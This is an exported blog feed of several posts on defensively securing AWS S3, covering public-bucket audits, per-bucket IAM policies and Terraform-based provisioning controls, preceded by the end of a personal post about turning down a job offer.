Things were all in place except for a few things that I spoke about where we were in disagreement. And although I felt that I could fill in the gap @POSTMAN and so did they that they could match my aspirations or vice-versa, but guess this is a skill am yet to master (and it’s a hard one to), you have to make tough decisions in life. And you don’t mostly get the best of both the worlds. Compromises and shortcomings are meant to be made and accepted. And so I slept over the discussion, with the ball in my court and the next morning spoke to the same guy (who only looked in his late 20s, but actually was a C employee @POSTMAN) expressing how hard it was to let go off the offer I had been made from POSTMAN at that point in time, due to a few, but strong enough, points that made me take that decision. Later that same day, I went through the LinkedIn profiles of some of the team I had met in person @POSTMAN and I was not surprised that the decision I had to make was actually hard. Those guys were among the ones you would always want to learn from. Sheer brilliance. And not that I regret giving it up, but I am glad I did polish that skill I have been trying to master.

]]>
<![CDATA[Proactively Secure AWS S3]]>http://localhost:2368/proactively-secure-aws-s3/5e3fbdb0b9fad24fb2610116Sun, 09 Feb 2020 11:21:03 GMTIn the previous blogpost we explored the status of our AWS S3 by doing audits around it. We spoke to multiple of our key stakeholders, including the devs & the systems teams to understand how could we fit S3 security in the context of our specific organization. While the audits are essential (& an absolutely mandatory) exercise, towards our goal, it is not really scalable. It helps with the clean up task, but doesn't really ensure that more mess is not being dumped on. Hence, it becomes crucial to figure out ways to proactively ensure that any new S3 resource creation follows a certain baseline/benchmark. So with that prelude, let's explore this section with a similar approach like the last one.

What

Have a system in place to ensure that any new S3 resources getting created follow a certain security benchmark.

Why

To ensure that new S3 resource creations are secure by default as per our contextual definition of security. This consequently leads to getting the problem of insecure S3 sorted at the root.

How

From the results of the last section we can infer that there are some very specific needs of our devs around AWS S3 requirements. More often that not, a very loosely access controlled S3 resource is not really needed. In the process of the audits, we also made certain rules around buckets, their access & their names. So to have proactive measures implemented, we would define our controls first as a set of rules/policies & then build tooling or systems to facilitate easier adoption of &/or enforcement these policies. And as the last time, we would need measurable criteria to verify if we have achieved what we wanted to or not, which gets us to our milestones listed below.

Milestones

  • [ ] A policy document detailing the rules that would define what is considered secure in the context of our organization
  • [ ] A system that implements/enforces this policy document
  • [ ] Number of violations of the above rules reported in the audits on newly created resources after the proactive system/s are implemented

We had already created a list of rules in the previous blogpost. In addition to those let us say that there are a couple of more use cases that were identified over a period of time. So our extended rule/policies set now become:

  1. Only & only the following 3 operations would be allowed onto any newly created bucket: s3:GetObject, s3:PutObject and s3:DeleteObject
  2. There would be one IAM user for every single bucket who would be allowed the above 3 access permissions onto that bucket & that bucket alone.
  3. Cross account S3 access would not be allowed
  4. Every bucket will have a subfolder that would allow any objects inside it to be world/public readable
  5. All S3 resources would be created only with the provisioned system to do so
Now once again, the above are a very contextual set of rules & policies that depend on each organization. It still makes case for an example.

The second bit is to think about a system that would technically implement the above policies. One of the ways to do so would be to use Terraform. The details of what it is & how it can be setup & used is quite decently documented in the above link. For our use case, we would make use of the below Terraform script to ensure that any new bucket creation abides by all the rules/policies we identified above.

c0n71nu3/s3ProactiveSecure
Terraform for securing AWS S3 proactively (opinionated) - c0n71nu3/s3ProactiveSecure

Having the terraform script solves our requirement to a big extent.

The next question, however, that arises is how/who would run this script? This aspect has to be controlled. Giving it away to anyone & everyone would again wind us up in a bad state. One of the ways to do this could be have another layer in between the Terraform script (version controlled), which actually makes the infra changes, and the users who need these S3 buckets.

Pros of this approach

  1. The Terraform script itself would be version controlled & source maintained (with all the respective checks & controls around that system). This means that the credentials to access the underlying infra does not need to be given out to any users at all. It also ensures that only the approved rules, mentioned in the script, are used for actual resource creation. Plus the inherent benefits of audit capabilities packed with it being version controlled.  
  2. This additional layer would be the one that the user would finally interface with. Hence, all the details of the underlying Terraform can be abstracted out, thus making it very simple for any developers to create an S3 bucket.

Cons of this approach

It becomes extremely crucial that this additional layer be very tightly controlled, especially in a situation where this system may become a solution for provisioning other infra related resources as well. It needs to have it's own tamper proof, securely maintained, audit trails around which resource creation was triggered by which user.

There could possibly be many other approaches to achieve the proactive controls depending on your specific context again.

One such system that readily provides exactly this capability is this awesome tool from GoJek:

gojek/proctor
A Developer-Friendly Automation Orchestrator. Contribute to gojek/proctor development by creating an account on GitHub.

When the terraform script mentioned above is used with the above tool, what it provides (from our use case's perspective) is a command to the user of the form:

proctor execute create-s3-bucket --name=myBucket --public=myCustomPublicFolder

and produces as output the same thing as mentioned in my Github link above.

Once the above systems are provisioned & made available to the users, the last bit that remains is to ensure that devs (or most users in general) create any S3 resources only through the above system. This would be more of a process driven thing again, which may include removal of, say, AWS console access/capabilities of any/all users. Once again this is quite contextual depending on how things are being managed at a given organization.

With all of this we are ascertained that any new bucket creations would be as per our defined policies (& technically enforced for the most part). There may be exceptions at times, which would need to be accommodated on a on-demand basis (& perhaps eventually generalized & made a part of the above/another system if needed). Our audits, from the last blog post, are already set up to run as a cron. And using that we can track if the proactive approach, we discussed above, has actually lead to any improvements in the creation of S3 resources.

Revisiting our milestones:

[✔︎] A policy document detailing the rules that would define what is considered secure in the context of our organization
[✔︎] A system that implements/enforces this policy document
[✔︎] Number of violations of the above rules reported in the audits on newly created resources after the proactive system/s are implemented

Revisiting our Objective 1: Secure AWS S3 plan:

[✔︎] Audit & ensure that the existing open buckets/objects fixed/accounted for
[✔︎] Ensure that any new buckets/objects being created are secure
[ ] Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible


Credits:

  • @vjdhama for guidance around Terraform
]]>
<![CDATA[Audit AWS S3]]>http://localhost:2368/audit-aws-s3/5e3e578704b19e5725a51317Sat, 08 Feb 2020 06:46:57 GMTWhat

Go through all the existing S3 buckets & objects in the AWS infra & check to see how many & which of those are publicly accessible & why.

Why

  • We need to get a picture of the current state of S3 in our infrastructure . This would help us assess what & how much work needs to be done
  • It would help us keep a track of our progress
  • This essentially defines our benchmark

How

There's a possibility that this is the first time that the S3 resource is going to be used in our AWS infra, in which case, the effects of audits may not be immediately visible. Nevertheless, audits still make sense as the usage of S3, in our infra, expands.

In the other case, where AWS S3 is already being used in the infra, this could easily become one of the most time taking (& consuming) task. We could choose to do this manually by logging into the AWS console everyday & doing this audit manually or with the power of programming/scripting (especially in python) bestowed in us, we could choose to automate the audits. (I am not a big fan of the former approach personally, at all!)

Milestones

  • [ ] get a list of all existing buckets/objects, their existing access permissions & possibly their owners & reasons for why these buckets/objects are public
  • [ ] get a count of buckets/objects that are publicly accessible
  • [ ] have a script ensuring that this list is regularly updated & maintained

As mentioned earlier, one way of doing the above is to goto the AWS console & look for these buckets & their permissions & maintain a record of the same manually. However, I prefer automation wherever possible (& sensible). There are plenty of open source scripts/tools that let you do these kind of audits. A simple Google search would give enough good results, like:

scalefactory/s3audit
CLI tool for auditing S3 buckets. Contribute to scalefactory/s3audit development by creating an account on GitHub.
SecOps-Institute/AWS-S3-Buckets-Audit-Users
Ever tried to summarise the User access to the S3 buckets in your AWS Account? Here is the tool that can help you do the same - SecOps-Institute/AWS-S3-Buckets-Audit-Users
richarvey/s3-permission-checker
Check read, write permissions on S3 buckets in your account - richarvey/s3-permission-checker

etc. All of the above are good tools that can be used to get S3 audits in place.

The above script helps us achieve all the milestones identified above, except the part that mentions "possibly their owners & reasons for why these buckets/objects are public". This is a manual thing that needs to be done, unless there's already enough tooling in the existing infra that maintains this record already.

However, once we have captured the above data & analyzed it, we are in a position to determine what exactly are the requirements of our developers, why do they need buckets/objects with a certain access & which all of the buckets/objects can/should remain with lenient access controls. Consequently, this allows for more informed decisions on what may be called insecure in the context of our developers/our org requirements, instead of a one size fits all approach. It helps us decide the strategy that would best suit the custom needs of our devs while ensuring security around anything (s3 in this case).

For example, in our use case, after doing the above exercise & extended discussions with our devops/systems team/enough devs, we concluded on the below strategy for managing access around our S3:

  1. Only & only the following 3 operations should be allowed onto any bucket: s3:GetObject, s3:PutObject and s3:DeleteObject
  2. There should be one IAM user for every single bucket who would be allowed the above 3 access permissions onto that bucket & that bucket alone. A naming convention was also made ensuring that all such IAM user names end with -s3 so we could easily identify these users as & when needed
  3. All of these users must belong to the only one AWS account that we use, or in other words, no cross account access allowed

Any buckets that do not follow the above criteria would be considered insecure.

Now the above example is a very opinionated conclusion based on our specific requirements. This could be anything else in your case.

So, to suit our specific audit needs, we came up with a custom audit script, which can be found here:

c0n71nu3/s3Auditor
Contribute to c0n71nu3/s3Auditor development by creating an account on GitHub.

After the results of the above audit are available, the next step is to start working on the data by getting the bucket/object access fixed where ever identified as necessary. This may again be quite a manual task (& a mammoth in our case), depending on how the processes are defined in your org, as it may need context, permissions, execution capabilities/bandwidth etc. to get these fixed. Once all the identified issues are fixed, we would have reached a clean slate. The audits would need to be still run periodically though to ensure that the security team is on top of things should anything come up again after the audits or to keep a track of the progress around the clean up itself.

The number of buckets still existing with unacceptable access gives a great deal of clarity on whether efforts are being invested in the right direction or not. Mangers/leadership please smile :)

Revisiting our milestones:

  • [✔︎] get a list of all existing buckets/objects, their existing access permissions & possibly their owners & reasons for why these buckets/objects are public
  • [✔︎] get a count of buckets/objects that are publicly accessible
  • [✔︎] have a script ensuring that this list is regularly updated & maintained

Revisiting our Objective 1: Secure AWS S3 plan:

[✔︎] Audit & ensure that the existing open buckets/objects fixed/accounted for
[ ] Ensure that any new buckets/objects being created are secure
[ ] Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible

]]>
<![CDATA[Objective 1: Secure AWS S3]]>http://localhost:2368/objective-1-secure-aws-s3/5e369ea804b19e5725a512b1Sun, 02 Feb 2020 10:05:33 GMTWhat is AWS S3?

Very simply put, it is a service offered by AWS that can be used as storage (called buckets) for different types of files.

So what does it mean to secure AWS S3?

It could mean n number of things. One of the things is to ensure that the buckets & it's contents (objects) are access controlled & we'll focus on this aspect.

(Others could include things like ensuring that the bucket & it's contents are protected against data loss, s3 objects are encrypted at rest, there's logging enabled for the buckets etc. We would not talk about these or any others in this case. Also, AWS by default has options to ensure public access around S3 is taken care of , like disabling public access at the account level itself. We would not talk about this either, as may not always be feasible for every org/use case, like it wasn't in our case)

Key result: No open/public buckets/objects

We need a measurable key result to ensure that we have been able to achieve our objective. We define our key result as a measure of the number of AWS S3 buckets or any content/s within them that are publicly accessible. So ideally, if we could define zero number of open/public buckets/objects as our criteria to say that we have achieved our objective, nothing like it.

But of course there could be reasons for certain buckets or objects (contents of a bucket) to be publicly accessible, depending on the business context, which always is/should be the highest priority. Hence our actual key result, to accommodate for the above, becomes:

  • No open/public buckets/objects,
  • at least not without prior approval from the security team or the information of the security team.

Plan

Below would be our plan to reach our key result/s & finally achieve our objective too.

  1. Audit & ensure that the existing open buckets/objects fixed/accounted for
  2. Ensure that any new buckets/objects being created are secure
  3. Ensure that the security team is made aware of any insecure buckets/objects existence/creation (if at all) as quickly as possible
]]>
<![CDATA[Securing Your Cloud Infra]]>http://localhost:2368/securing-cloudinfra-intro/5e344fc8cd85244165d16facFri, 31 Jan 2020 16:03:29 GMTSo this blogpost has been sitting in my drafts for indeed a very long time. And I am definitely late to the party, but hopefully the write up is still of some help to someone.

Securing any cloud environment, for that matter, is a vast topic & it would be difficult to cover it all in one single blogpost. Hence, I would try to break it down as per a generic approach that I usually take when trying to think of solutions around any given problem. Also, we would try to have the blogpost designed with 2 things in mind:

  • we would approach it one step at a time
  • we would try to keep our solutions as unblocking as possible for our devs

A few things that I have learnt, sort of the hard way & I am very grateful for this learning, is:

  1. to identify the actual root cause of the problem
  2. to measure what matters  (excellent read IMHO)
  3. collaborate (wherever & whenever possible) with devs & systems teams. It makes a security engineer's job a breeze & solutions worthwhile !

For this post we would not focus on identification of the root cause of the problem, since this post is directed towards securing your cloud infra & of course because I would like to keep this post more technical than philosophical. We would assume that we have a problem statement at hand that needs to be solved.

For this post and (hopefully) a few follow up ones, we would focus on securing AWS, one step at a time. AWS itself has plenty of resources & securing AWS essentially means securing each of these resources, of course depending on what resources you are using out of these. It does not make a lot of sense to try securing s3, for example, if you're not really using it at all.

Problem statement: Secure AWS infrastructure

If we want to solve the above problem, we would break up the problem into smaller sub problems/objectives.

Objectives:

  1. Secure AWS S3
  2. Secure Ec2 instances
  3. Secure IAM
  4. Secure EKS

The above is a very limited list. But for now, let us focus on them alone and one at a time.


Credits:

  • @makash for the constant motivation
  • @amolnaik4 for guidance around thought process
  • @AjeyGore for introduction to measure what matters
]]>